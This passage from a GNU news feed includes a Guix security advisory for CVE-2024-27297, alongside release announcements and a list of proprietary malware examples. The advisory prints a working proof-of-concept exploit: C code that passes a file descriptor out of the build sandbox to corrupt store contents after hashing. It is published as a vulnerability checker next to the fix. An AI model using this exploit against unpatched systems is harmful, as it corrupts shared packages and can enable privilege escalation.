research work should not be considered a mundanity or an exercise that’s
<a href="https://hpc.guix.info/blog/2022/07/is-reproducibility-practical/">“overkill”</a>.
The ability to rerun, inspect, and modify software are the natural
extension of the scientific method. Without a companion reproducible
software environment, research papers <em>are merely the advertisement of
scholarship</em>, to paraphrase Jon Claerbout.</p><h1>The future</h1><p>The astute reader surely noticed that we didn’t answer question #1
above:</p><blockquote><p>How can we tell which packages needs to be “fixed”, and how: building
at a specific date, on a specific CPU?</p></blockquote><p>It’s a fact that Guix so far lacks information about the date, kernel,
or CPU model that should be used to build a given package.
<a href="https://guix.gnu.org/manual/devel/en/html_node/Derivations.html">Derivations</a>
purposefully lack that information on the grounds that it cannot be
enforced in user land and is <em>rarely</em> necessary—which is true, but
“rarely” is not the same as “never”, as we saw. Should we create a
catalog of date, CPU, and/or kernel annotations for packages found in
past revisions? Should we define, for the long-term, an
all-encompassing derivation format? If we did and effectively required
virtual build machines, what would that mean from a
<a href="https://guix.gnu.org/en/blog/tags/bootstrapping/">bootstrapping</a>
standpoint?</p><p>Here’s another option: build packages in VMs running in the year 2100,
say, and on a baseline CPU. We don’t need to require all users to set
up a virtual build machine—that would be impractical. It may be enough
to set up the project build farms so they build everything that way.
This would allow us to catch time traps and <a href="https://en.wikipedia.org/wiki/Year_2038_problem">year 2038
bugs</a> before they bite.</p><p>Before we can do that, the <code>virtual-build-machine</code> service needs to be
optimized. Right now, offloading to build VMs is as heavyweight as
offloading to a separate physical build machine: data is transferred
back and forth over SSH over TCP/IP. The first step will be to run SSH
over a paravirtualized transport instead such as <a href="https://www.man7.org/linux/man-pages/man7/vsock.7.html"><code>AF_VSOCK</code>
sockets</a>.
Another avenue would be to make <code>/gnu/store</code> in the guest VM an overlay
over the host store so that inputs do not need to be transferred and
copied.</p><p>Until then, happy software (re)deployment!</p><h1>Acknowledgments</h1><p>Thanks to Simon Tournier for insightful comments on a previous version
of this post.</p>2024-03-13T15:30:00+00:00Ludovic CourtèsGNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)
https://guix.gnu.org/blog/2024/fixed-output-derivation-sandbox-bypass-cve-2024-27297//
<p>A security issue has been identified in
<a href="https://guix.gnu.org/en/manual/devel/en/html_node/Invoking-guix_002ddaemon.html"><code>guix-daemon</code></a>
which allows for <a href="https://guix.gnu.org/manual/devel/en/html_node/Derivations.html#index-fixed_002doutput-derivations">fixed-output
derivations</a>,
such as source code tarballs or Git checkouts, to be corrupted by an
unprivileged user. This could also lead to local privilege escalation.
This was originally reported to Nix but also affects Guix as we share
some underlying code from an older version of Nix for the
<code>guix-daemon</code>. Readers only interested in making sure their Guix is up
to date and no longer affected by this vulnerability can skip down to
the "Upgrading" section.</p><h1>Vulnerability</h1><p>The basic idea of the attack is to pass file descriptors through Unix
sockets to allow another process to modify the derivation contents.
This was first reported to Nix by jade and puckipedia with further
details and a proof of concept
<a href="https://hackmd.io/03UGerewRcy3db44JQoWvw">here</a>. Note that the proof
of concept is written for Nix and has been adapted for GNU Guix below.
This security advisory is registered as
<a href="https://www.cve.org/CVERecord?id=CVE-2024-27297">CVE-2024-27297</a>
(details are also available at Nix's GitHub <a href="https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37">security
advisory</a>)
and rated "moderate" in severity.</p><p>A fixed-output
<a href="https://guix.gnu.org/en/manual/devel/en/html_node/Derivations.html">derivation</a>
is one where the output hash is known in advance. For instance, to
produce a source tarball. The GNU Guix build sandbox purposefully
excludes network access (for security and to ensure we can control and
reproduce the build environment), but a fixed-output derivation does
have network access, for instance to download that source tarball.
However, as stated, the hash of output must be known in advance, again
for security (we know if the file contents would change) and
reproducibility (should always have the same output). The
<code>guix-daemon</code> handles the build process and writing the output to the
store, as a privileged process.</p><p>In the build sandbox for a fixed-output derivation, a file descriptor
to its contents could be shared with another process via a Unix
socket. This other process, outside of the build sandbox, can then
modify the contents written to the store, changing them to something
malicious or otherwise corrupting the output. While the output hash
has already been determined, these changes would mean a fixed-output
derivation could have contents written to the store which do not match
the expected hash. This could then be used by the user or other
packages as well.</p><h1>Mitigation</h1><p>This security issue (tracked <a href="https://issues.guix.gnu.org/69728">here</a>
for GNU Guix) has been fixed by
<a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=8f4ffb3fae133bb21d7991e97c2f19a7108b1143">two</a>
<a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=ff1251de0bc327ec478fc66a562430fbf35aef42">commits</a>
by Ludovic Courtès. Users should make sure they have updated to <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=ff1251de0bc327ec478fc66a562430fbf35aef42">this
second
commit</a>
to be protected from this vulnerability. Upgrade instructions are in
the following section.</p><p>While several possible mitigation strategies were detailed in the
original report, the simplest fix is just copy the derivation output
somewhere else, deleting the original, before writing to the store.
Any file descriptors will no longer point to the contents which get
written to the store, so only the <code>guix-daemon</code> should be able to
write to the store, as designed. This is what the Nix project used in
their <a href="https://github.com/NixOS/nix/commit/244f3eee0bbc7f11e9b383a15ed7368e2c4becc9">own
fix</a>.
This does add an additional copy/delete for each file, which may add a
performance penalty for derivations with many files.</p><p>A proof of concept by Ludovic, adapted from the one in the original
Nix report, is available at the end of this post. One can run this
code with</p><pre><code class="language-sh">guix build -f fixed-output-derivation-corruption.scm -M4</code></pre><p>This will output whether the current <code>guix-daemon</code> being used is
vulnerable or not. If it is vulnerable, the output will include a line similar to</p><pre><code class="language-sh">We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!</code></pre><p>The corrupted file can be removed with</p><pre><code class="language-sh">guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*</code></pre><p>In general, corrupt files from the store can be found with</p><pre><code class="language-sh">guix gc --verify=contents</code></pre><p>which will also include any files corrupted by through this
vulnerability. Do note that this command can take a long time to
complete as it checks every file under <code>/gnu/store</code>, which likely has
many files.</p><h1>Upgrading</h1><p>Due to the severity of this security advisory, we strongly recommend
all users to upgrade their <code>guix-daemon</code> immediately.</p><p>For a Guix System the procedure is just reconfiguring the system after
a <code>guix pull</code>, either restarting <code>guix-daemon</code> or rebooting. For
example,</p><pre><code class="language-sh">guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon</code></pre><p>where <code>/run/current-system/configuration.scm</code> is the current system
configuration but could, of course, be replaced by a system
configuration file of a user's choice.</p><p>For Guix running as a package manager on other distributions, one
needs to <code>guix pull</code> with <code>sudo</code>, as the <code>guix-daemon</code> runs as root,
and restart the <code>guix-daemon</code> service. For example, on a system using
systemd to manage services,</p><pre><code class="language-sh">sudo --login guix pull
sudo systemctl restart guix-daemon.service</code></pre><p>Note that for users with their distro's package of Guix (as opposed to
having used the <a href="https://guix.gnu.org/en/manual/devel/en/html_node/Binary-Installation.html">install
script</a>)
you may need to take other steps or upgrade the Guix package as per
other packages on your distro. Please consult the relevant
documentation from your distro or contact the package maintainer for
additional information or questions.</p><h1>Conclusion</h1><p>One of the key features and design principles of GNU Guix is to allow
unprivileged package management through a secure and reproducible
<a href="https://guix.gnu.org/en/manual/devel/en/html_node/Build-Environment-Setup.html">build
environment</a>.
While every effort is made to protect the user and system from any
malicious actors, it is always possible that there are flaws yet to be
discovered, as has happened here. In this case, using the ingredients
of how file descriptors and Unix sockets work even in the isolated
build environment allowed for a security vulnerability with moderate
impact.</p><p>Our thanks to jade and puckipedia for the original report, and Picnoir
for bringing this to the attention of the GNU Guix <a href="https://guix.gnu.org/en/security/">security
team</a>. And a special thanks to
Ludovic Courtès for a prompt fix and proof of concept.</p><p>Note that there are current efforts to rewrite the <code>guix-daemon</code> in
Guile by Christopher Baines. For more information and the latest news
on this front, please refer to the <a href="https://guix.gnu.org/en/blog/2023/a-build-daemon-in-guile/">recent blog
post</a> and
<a href="https://lists.gnu.org/archive/html/guix-devel/2024-02/msg00253.html">this
message</a>
on the <a href="https://lists.gnu.org/mailman/listinfo/guix-devel">guix-devel</a>
mailing list.</p><h2>Proof of Concept</h2><p>Below is code to check if a <code>guix-daemon</code> is vulnerable to this
exploit. Save this file as <code>fixed-output-derivation-corruption.scm</code>
and run following the instructions above, in "Mitigation." Some
further details and example output can be found on <a href="https://issues.guix.gnu.org/69728#5">issue
#69728</a></p><pre><code class="language-scheme">;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.
(use-modules (guix)
(guix modules)
(guix profiles)
(gnu packages)
(gnu packages gnupg)
(gcrypt hash)
((rnrs bytevectors) #:select (string->utf8)))
(define (compiled-c-code name source)
(define build-profile
(profile (content (specifications->manifest '("gcc-toolchain")))))
(define build
(with-extensions (list guile-gcrypt)
(with-imported-modules (source-module-closure '((guix build utils)
(guix profiles)))
#~(begin
(use-modules (guix build utils)
(guix profiles))
(load-profile #+build-profile)
(system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))
(computed-file name build))
(define sender-source
(plain-file "sender.c" "
#include <sys/socket.h>
#include <sys/un.h>
#include <stdlib.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
int main(int argc, char **argv) {
setvbuf(stdout, NULL, _IOLBF, 0);
int sock = socket(AF_UNIX, SOCK_STREAM, 0);
// Set up an abstract domain socket path to connect to.
struct sockaddr_un data;
data.sun_family = AF_UNIX;
data.sun_path[0] = 0;
strcpy(data.sun_path + 1, \"dihutenosa\");
// Now try to connect, To ensure we work no matter what order we are
// executed in, just busyloop here.
int res = -1;
while (res < 0) {
printf(\"attempting connection...\\n\");
res = connect(sock, (const struct sockaddr *)&data,
offsetof(struct sockaddr_un, sun_path)
+ strlen(\"dihutenosa\")
+ 1);
if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
if (errno != ECONNREFUSED) break;
usleep(500000);
}
// Write our message header.
struct msghdr msg = {0};
msg.msg_control = malloc(128);
msg.msg_controllen = 128;
// Write an SCM_RIGHTS message containing the output path.
struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
hdr->cmsg_len = CMSG_LEN(sizeof(int));
hdr->cmsg_level = SOL_SOCKET;
hdr->cmsg_type = SCM_RIGHTS;
int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
msg.msg_controllen = CMSG_SPACE(sizeof(int));
// Write a single null byte too.
msg.msg_iov = malloc(sizeof(struct iovec));
msg.msg_iov[0].iov_base = \"\";
msg.msg_iov[0].iov_len = 1;
msg.msg_iovlen = 1;
// Send it to the othher side of this connection.
res = sendmsg(sock, &msg, 0);
if (res < 0) perror(\"sendmsg\");
int buf;
// Wait for the server to close the socket, implying that it has
// received the commmand.
recv(sock, (void *)&buf, sizeof(int), 0);
}"))
(define receiver-source
(mixed-text-file "receiver.c" "
#include <sys/socket.h>
#include <sys/un.h>
#include <stdlib.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/inotify.h>
int main(int argc, char **argv) {
int sock = socket(AF_UNIX, SOCK_STREAM, 0);
// Bind to the socket.
struct sockaddr_un data;
data.sun_family = AF_UNIX;
data.sun_path[0] = 0;
strcpy(data.sun_path + 1, \"dihutenosa\");
int res = bind(sock, (const struct sockaddr *)&data,
offsetof(struct sockaddr_un, sun_path)
+ strlen(\"dihutenosa\")
+ 1);
if (res < 0) perror(\"bind\");
res = listen(sock, 1);
if (res < 0) perror(\"listen\");
while (1) {
setvbuf(stdout, NULL, _IOLBF, 0);
printf(\"accepting connections...\\n\");
int a = accept(sock, 0, 0);
if (a < 0) perror(\"accept\");
struct msghdr msg = {0};
msg.msg_control = malloc(128);
msg.msg_controllen = 128;
// Receive the file descriptor as sent by the smuggler.
recvmsg(a, &msg, 0);
struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
while (hdr) {
if (hdr->cmsg_level == SOL_SOCKET
&& hdr->cmsg_type == SCM_RIGHTS) {
int res;
// Grab the copy of the file descriptor.
memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
printf(\"preparing our hand...\\n\");
ftruncate(res, 0);
// Write the expected contents to the file, tricking Nix
// into accepting it as matching the fixed-output hash.
write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));
// But wait, the file is bigger than this! What could
// this code hide?
// First, we do a bit of a hack to get a path for the
// file descriptor we received. This is necessary because
// that file doesn't exist in our mount namespace!
char buf[128];
sprintf(buf, \"/proc/self/fd/%d\", res);
// Hook up an inotify on that file, so whenever Nix
// closes the file, we get notified.
int inot = inotify_init();
inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);
// Notify the smuggler that we've set everything up for
// the magic trick we're about to do.
close(a);
// So, before we continue with this code, a trip into Nix
// reveals a small flaw in fixed-output derivations. When
// storing their output, Nix has to hash them twice. Once
// to verify they match the \"flat\" hash of the derivation
// and once more after packing the file into the NAR that
// gets sent to a binary cache for others to consume. And
// there's a very slight window inbetween, where we could
// just swap the contents of our file. But the first hash
// is still noted down, and Nix will refuse to import our
// NAR file. To trick it, we need to write a reference to
// a store path that the source code for the smuggler drv
// references, to ensure it gets picked up. Continuing...
// Wait for the next inotify event to drop:
read(inot, buf, 128);
// first read + CA check has just been done, Nix is about
// to chown the file to root. afterwards, refscanning
// happens...
// Empty the file, seek to start.
ftruncate(res, 0);
lseek(res, 0, SEEK_SET);
// We swap out the contents!
static const char content[] = \"This file has been corrupted!\\n\";
write(res, content, strlen (content));
close(res);
printf(\"swaptrick finished, now to wait..\\n\");
return 0;
}
hdr = CMSG_NXTHDR(&msg, hdr);
}
close(a);
}
}"))
(define nonce
(string-append "-" (number->string (car (gettimeofday)) 16)
"-" (number->string (getpid))))
(define original-text
"This is the original text, before corruption.")
(define derivation-that-exfiltrates-fd
(computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
(with-imported-modules '((guix build utils))
#~(begin
(use-modules (guix build utils))
(invoke #+(compiled-c-code "sender" sender-source))
(call-with-output-file #$output
(lambda (port)
(display #$original-text port)))))
#:options `(#:hash-algo sha256
#:hash ,(sha256
(string->utf8 original-text)))))
(define derivation-that-grabs-fd
(computed-file (string-append "derivation-that-grabs-fd" nonce)
#~(begin
(open-output-file #$output) ;make sure there's an output
(execl #+(compiled-c-code "receiver" receiver-source)
"receiver"))
#:options `(#:hash-algo sha256
#:hash ,(sha256 #vu8()))))
(define check
(computed-file "checking-for-vulnerability"
#~(begin
(use-modules (ice-9 textual-ports))
(mkdir #$output) ;make sure there's an output
(format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
#+derivation-that-grabs-fd
#+derivation-that-exfiltrates-fd)
(let ((content (call-with-input-file
#+derivation-that-exfiltrates-fd
get-string-all)))
(format #t "Here is what we see in ~a: ~s~%~%"
#+derivation-that-exfiltrates-fd content)
(if (string=? content #$original-text)
(format #t "Failed to corrupt ~a, \
your system is safe.~%"
#+derivation-that-exfiltrates-fd)
(begin
(format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
#+derivation-that-exfiltrates-fd)
(exit 1)))))))
check</code></pre><h3>About GNU Guix</h3><p><a href="https://guix.gnu.org">GNU Guix</a> is a transactional package manager
and an advanced distribution of the GNU system that <a href="https://www.gnu.org/distros/free-system-distribution-guidelines.html">respects user
freedom</a>.
Guix can be used on top of any system running the Hurd or the Linux
kernel, or it can be used as a standalone operating system
distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.</p><p>In addition to standard package management features, Guix supports
transactional upgrades and roll-backs, unprivileged package
management, per-user profiles, and garbage collection. When used as a
standalone GNU/Linux distribution, Guix offers a declarative,
stateless approach to operating system configuration management. Guix
is highly customizable and hackable through
<a href="https://www.gnu.org/software/guile">Guile</a> programming interfaces and
extensions to the <a href="http://schemers.org">Scheme</a> language.</p>2024-03-12T17:00:00+00:00John KehayiasFSF Events: Free Software Directory meeting on IRC: Friday, March 15, starting at 12:00 EDT (16:00 UTC)
http://www.fsf.org/events/fsd-20240315-irc
Join the FSF and friends on Friday, March 15, from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.2024-03-11T19:55:44+00:00FSF Eventshyperbole @ Savannah: GNU Hyperbole Major Release 9 (V9.0.1) Rhapsody
https://savannah.gnu.org/news/?id=10608
<h2>Overview</h2>
<p>
<br />
GNU Hyperbole 9.0.1, the Rhapsody release, is now available on GNU ELPA.
<br />
And oh what a release it is: extensive new features, new video
<br />
demos, org and org roam integration, Markdown and Org file support in
<br />
HyRolo, recursive directory and wildcard file scanning in HyRolo, and
<br />
much more.
<br />
<br />
What's new in this release is extensively described here:
<br />
<br />
<a href="https://www.gnu.org/s/hyperbole/HY-NEWS.html">www.gnu.org/s/hyperbole/HY-NEWS.html</a>
<br />
<br />
Everything back until release 8.0.0 is new since the last major release
<br />
announcement (almost a year and a half ago), so updates are extensive.
<br />
<br />
Hyperbole is like Markdown for hypertext. Hyperbole automatically
<br />
recognizes dozens of common patterns in any buffer regardless of mode
<br />
and transparently turns them into hyperbuttons you can instantly
<br />
activate with a single key. Email addresses, URLs, grep -n outputs,
<br />
programming backtraces, sequences of Emacs keys, programming
<br />
identifiers, Texinfo and Info cross-references, Org links, Markdown
<br />
links and on and on. All you do is load Hyperbole and then your text
<br />
comes to life with no extra effort or complex formatting.
<br />
<br />
But Hyperbole is also a personal information manager with built-in
<br />
capabilities of contact management/hierarchical record lookup,
<br />
legal-numbered outlines with hyperlinkable views and a unique window
<br />
and frame manager. It is even Org-compatible so you can use all of
<br />
Org's capabilities together with Hyperbole.
<br />
<br />
Hyperbole stays out of your way but is always a key press away when
<br />
you need it. Like Emacs, Org, Counsel and Helm, Hyperbole has many
<br />
different uses, all based around the theme of reducing cognitive load
<br />
and improving your everyday information management. It reduces
<br />
cognitive load by using a single Action Key, {M-RET}, across many
<br />
different contexts to perform the best default action in each.
<br />
<br />
Hyperbole has always been one of the best documented Emacs packages.
<br />
With Version 9 comes excellent test coverage: over 400 automated tests
<br />
are run with every update against every major version of Emacs since
<br />
version 27, to ensure quality. We hope you'll give it a try.
<br />
<br />
</p>
<h2>Videos</h2>
<p>
<br />
If you prefer video introductions, visit the videos linked to below;
<br />
otherwise, skip to the next section.
<br />
<br />
</p>
<h3>GNU Hyperbole Videos with Web Links</h3>
<ul>
<li>Overview and Demo - Covers all of Hyperbole - Hyperlink timestamps to watch each section: <a href="https://youtu.be/WKwZHSbHmPg">https://youtu.be/WKwZHSbHmPg</a>
</li>
<li>Quick Introduction: <a href="https://youtu.be/K1MNUctggwI">https://youtu.be/K1MNUctggwI</a>
</li>
<li>Top 10 ways Hyperbole amps up Emacs: <a href="https://youtu.be/BysjfL25Nlc">https://youtu.be/BysjfL25Nlc</a>
</li>
<li>Introduction to Buttons: <a href="https://youtu.be/zoEht66N2PI">https://youtu.be/zoEht66N2PI</a>
</li>
<li>Linking Personal Info with Implicit Buttons: <a href="https://youtu.be/TQ_fG7b1iHI">https://youtu.be/TQ_fG7b1iHI</a>
</li>
<li>Powerful Productivity with Hyperbole and Org: <a href="https://youtu.be/BrTpTNEXMyY">https://youtu.be/BrTpTNEXMyY</a>
</li>
<li>HyRolo, fast contact/hierarchical record viewer: <a href="https://youtu.be/xdJGFdgKPFY">https://youtu.be/xdJGFdgKPFY</a>
</li>
<li>Using Koutline for stream of thought journaling: <a href="https://youtu.be/dO-gv898Vmg">https://youtu.be/dO-gv898Vmg</a>
</li>
<li>Build a Zettelkasten with HyRolo: <a href="https://youtu.be/HdlCK9w-LyQ">https://youtu.be/HdlCK9w-LyQ</a>
</li>
<li>HyControl, fast Emacs frame and window manager: <a href="https://youtu.be/M3-aMh1ccJk">https://youtu.be/M3-aMh1ccJk</a>
</li>
<li>Writing test cases for GNU Hyperbole: <a href="https://youtu.be/maNQSKxXIzI">https://youtu.be/maNQSKxXIzI</a>
</li>
<li>Find/Web Search: <a href="https://youtu.be/8lMlJed0-OM">https://youtu.be/8lMlJed0-OM</a>
</li>
</ul>
<p>
<br />
</p>
<h2>Installing and Using Hyperbole</h2>
<p>
<br />
To install within GNU Emacs, use:
<br />
<br />
{M-x package-install RET hyperbole RET}
<br />
<br />
Hyperbole installs in less than a minute and can be uninstalled even
<br />
faster if ever need be. Give it a try.
<br />
<br />
Then to invoke its minibuffer menu, use:
<br />
<br />
{C-h h} or {M-x hyperbole RET}
<br />
<br />
The best way to get a feel for many of its capabilities is to invoke the
<br />
all new, interactive FAST-DEMO and explore sections of interest:
<br />
<br />
{C-h h d d}
<br />
<br />
To permanently activate Hyperbole in your Emacs initialization file, add
<br />
the line:
<br />
<br />
(hyperbole-mode 1)
<br />
<br />
Hyperbole is a minor mode that may be disabled at any time with:
<br />
<br />
{C-u 0 hyperbole-mode RET}
<br />
<br />
The Hyperbole home page with screenshots is here:
<br />
<br />
<a href="https://www.gnu.org/s/hyperbole">www.gnu.org/s/hyperbole</a>
<br />
<br />
For use cases, see:
<br />
<br />
<a href="https://www.gnu.org/s/hyperbole/HY-WHY.html">www.gnu.org/s/hyperbole/HY-WHY.html</a>
<br />
<br />
For what users think about Hyperbole, see:
<br />
<br />
<a href="https://www.gnu.org/s/hyperbole/hyperbole.html#user-quotes">www.gnu.org/s/hyperbole/hyperbole.html#user-quotes</a>
<br />
<br />
Enjoy,
<br />
<br />
The Hyperbole Team<br />
</p>2024-03-10T22:22:58+00:00Mats Lidellwww @ Savannah: Malware in Proprietary Software - Latest Additions
https://savannah.gnu.org/news/?id=10606
<p>The initial injustice of proprietary software often leads to further injustices: <a href="https://www.gnu.org/proprietary/proprietary.html">malicious functionalities</a>.
<br />
<br />
The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.
<br />
<br />
We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.
<br />
<br />
</p>
<h3>Here are our latest additions</h3>
<h4>February 2024</h4>
<p><a href="https://www.gnu.org/proprietary/proprietary-surveillance.html">Proprietary Surveillance</a>
<br />
</p>
<ul>
<li>Surveillance cameras put in by government A to surveil for it may be surveilling for government B as well. That's because A put in a product <a href="https://www.rferl.org/a/ukraine-cctv-moscow-spying-schemes-investigation/32747767.html">made by B with nonfree software</a>.
</li>
</ul>
<p>(Please note that this article misuses the word <a href="https://www.gnu.org/philosophy/words-to-avoid.html#Hacker">"hack" to mean "break security."</a>)
<br />
</p>
<h4>January 2024</h4>
<p><a href="https://www.gnu.org/proprietary/malware-cars.html">Malware in Cars</a>
<br />
</p>
<ul>
<li>Recent autos offer a feature by which the drivers can connect their snoop-phones to the car. <a href="https://therecord.media/class-action-lawsuit-cars-text-messages-privacy">That feature snoops on the calls and texts</a> and gives the data to the car manufacturer, and to the state.
</li>
</ul>
<p>A good privacy law would prohibit cars recording this data about the users' activities. But not just <i>this</i> data—lots of other data too.
<br />
<br />
<a href="https://www.gnu.org/proprietary/proprietary-drm.html">DRM in Trains</a>
<br />
</p>
<ul>
<li>Newag, a Polish railway manufacturer, <a href="https://badcyber.com/dieselgate-but-for-trains-some-heavyweight-hardware-hacking/">puts DRM inside trains</a> to prevent third-party repairs.
<ul>
<li>The train's software contains code to detect if the GPS coordinates are near some third party repairers, or the train has not been running for some time. If yes, the train will be "locked up" (i.e. bricked). It was also possible to unlock it by pressing a secret combination of buttons in the cockpit, but this ability was removed by a manufacturer's software update.
</li>
<li>The train will also lock up after a certain date, which is hardcoded in the software.
</li>
<li>The company pushes a software update that detects if the DRM code has been bypassed, i.e. the lock should have been engaged but the train is still operational. If yes, the controller cabin screen will display a scary message warning about "copyright violation."
</li>
</ul>
</li>
</ul>
<p>
<br />
<a href="https://www.gnu.org/proprietary/proprietary-insecurity.html">Proprietary Insecurity in LogoFAIL</a>
<br />
</p>
<ul>
<li>x86 and ARM based computers shipped with UEFI are <a href="https://www.bleepingcomputer.com/news/security/logofail-attack-can-install-uefi-bootkits-through-bootup-logos/">potentially vulnerable to a design omission called LogoFAIL</a>. A cracker can replace the BIOS logo with a fake one that contains malicious code. Users can't fix this omission because it is in the nonfree UEFI firmware that users can't replace.
</li>
</ul>
<p>
<br />
<a href="https://www.gnu.org/proprietary/uhd-bluray-denies-your-freedom.html">4K UHD Blu-ray Disks, Super Duper Malware</a>
<br />
</p>
<ul>
<li>The UHD (Ultra High Definition, also known as 4K) Blu-ray standard involves several types of restrictions, both at the hardware and the software levels, which make “legitimate” playback of UHD Blu-ray media impossible on a PC with <a href="https://www.gnu.org//philosophy/free-sw.html">free/libre software</a>.
<ul>
<li><a href="https://www.gnu.org/proprietary/proprietary-drm.html">DRM</a> - UHD Blu-ray disks are encrypted with AACS, one of the worst kinds of DRM. Playing them on a PC requires software and hardware that meet stringent proprietary specifications, which developers can only obtain after signing an agreement that explicitly forbids them from disclosing any source code.
</li>
<li><a href="https://www.gnu.org/proprietary/proprietary-sabotage.html">Sabotage</a> - UHD Blu-ray disks are loaded with malware of the worst kinds. Not only does playback of these disks on a PC require proprietary software and hardware that enforce AACS, a very nasty DRM, but developers of software players are forbidden from disclosing any source code. The user could also lose the ability to play AACS-restricted disks anytime by attempting to play a new Blu-ray disk.
</li>
<li><a href="https://www.gnu.org/proprietary/proprietary-tethers.html">Tethering</a> - UHD Blu-ray disks are encrypted with keys that must be retrieved from a remote server. This makes repeated updates and internet connections a requirement if the user purchases several UHD Blu-ray disks over time.
</li>
<li><a href="https://www.gnu.org/proprietary/proprietary-insecurity.html">Insecurity</a> - Playing UHD Blu-ray disks on a PC requires Intel SGX (Software Guard Extensions), which not only has numerous security vulnerabilities, but also was deprecated and removed from mainstream Intel CPUs in 2022.
</li>
<li><a href="https://www.gnu.org/proprietary/proprietary-back-doors.html">Back Doors</a> - Playing UHD Blu-ray disks on a PC requires the Intel Management Engine, which has back doors and cannot be disabled. Every Blu-ray drive also has a back door in its firmware, which allows the AACS-enforcing organization to "revoke" the ability to play any AACS-restricted disk.
</li>
</ul>
</li>
</ul>
<p>
<br />
<a href="https://www.gnu.org/proprietary/proprietary-interference.html">Proprietary Interference</a>
<br />
</p>
<ul>
<li>Microsoft has been annoying people who wanted to close the proprietary program OneDrive on their computers, <a href="https://www.theverge.com/2023/11/8/23952878/microsoft-onedrive-windows-close-app-notification">forcing them to give the reason why they were closing it</a>. This prompt was removed after public pressure.
</li>
</ul>
<p>This is a reminder that angry users still have the power to make developers of proprietary software remove small annoyances. Don't count on public outcry to make them remove more profitable malware, though. Run away from proprietary software!<br />
</p>2024-03-08T02:05:58+00:00Dora ScilipotiGNU Taler news: GNU Taler v0.9.4 released
https://taler.net/en/news/2024-05.html
<article>
We are happy to announce the release of GNU Taler v0.9.4.
</article>2024-03-07T23:00:00+00:00GNU Taler newsGNUnet News: Messenger-GTK 0.9.0
https://gnunet.org/en/news/2024-03-messenger-gtk-0.9.0.html
<article id="newspost-content">
<h1>
Messenger-GTK 0.9.0
</h1>
<p>
Following the new release of "libgnunetchat" there have been some changes regarding the applications utilizing it. So we are pleased to announce the new release of the Messenger-GTK application. This release will be compatible with libgnunetchat 0.3.0 and GNUnet 0.21.0 upwards.
</p>
<h4>
Download links
</h4>
<ul>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/messenger-gtk-0.9.0.tar.gz">
messenger-gtk-0.9.0.tar.gz
</a>
</li>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/messenger-gtk-0.9.0.tar.gz.sig">
messenger-gtk-0.9.0.tar.gz.sig
</a>
</li>
</ul>
<p>
The GPG key used to sign is:
<a href="https://gnunet.org/~schanzen/3D11063C10F98D14BD24D1470B0998EF86F59B6A">
3D11063C10F98D14BD24D1470B0998EF86F59B6A
</a>
</p>
<p>
Note that due to mirror synchronization, not all links may be functional
early after the release. For direct access try
<a href="http://ftp.gnu.org/gnu/gnunet/">
http://ftp.gnu.org/gnu/gnunet/
</a>
</p>
<h4>
Noteworthy changes in 0.9.0
</h4>
<ul>
<li>
Contacts can be blocked and unblocked to filter chat messages.
</li>
<li>
Requests for permission to use a camera, autostart the application and running it in background.
</li>
<li>
Camera sensors can be selected to exchange contact information.
</li>
</ul>
<p>
A detailed list of changes can be found in the
<a href="https://git.gnunet.org/messenger-gtk.git/tree/ChangeLog">
ChangeLog
</a>
.
</p>
<h4>
Known Issues
</h4>
<ul>
<li>
Chats still require a reliable connection between GNUnet peers. So this still depends on the upcoming NAT traversal to be used outside of local networks for most users (see
<a href="https://bugs.gnunet.org/view.php?id=5710">
#5710
</a>
).
</li>
<li>
File sharing via the FS service should work in a GNUnet single-user setup but a multi-user setup breaks it (see
<a href="https://bugs.gnunet.org/view.php?id=7355">
#7355
</a>
)
</li>
</ul>
<p>
In addition to this list, you may also want to consult our bug tracker at
<a href="https://bugs.gnunet.org/">
bugs.gnunet.org
</a>
.
</p>
<h2>
messenger-cli 0.2.0
</h2>
<p>
There's also a new release of the terminal application using the GNUnet Messenger service. This release will ensure compatibility with changes in libgnunetchat 0.3.0 and GNUnet 0.21.0.
</p>
<h4>
Download links
</h4>
<ul>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/messenger-cli-0.2.0.tar.gz">
messenger-cli-0.2.0.tar.gz
</a>
</li>
<li>
<a href="http://ftpmirror.gnu.org/gnunet/messenger-cli-0.2.0.tar.gz.sig">
messenger-cli-0.2.0.tar.gz.sig
</a>
</li>
</ul>
<p>
The GPG key used to sign is:
<a href="https://gnunet.org/~schanzen/3D11063C10F98D14BD24D1470B0998EF86F59B6A">
3D11063C10F98D14BD24D1470B0998EF86F59B6A
</a>
</p>
<p>
Note that due to mirror synchronization, not all links may be functional
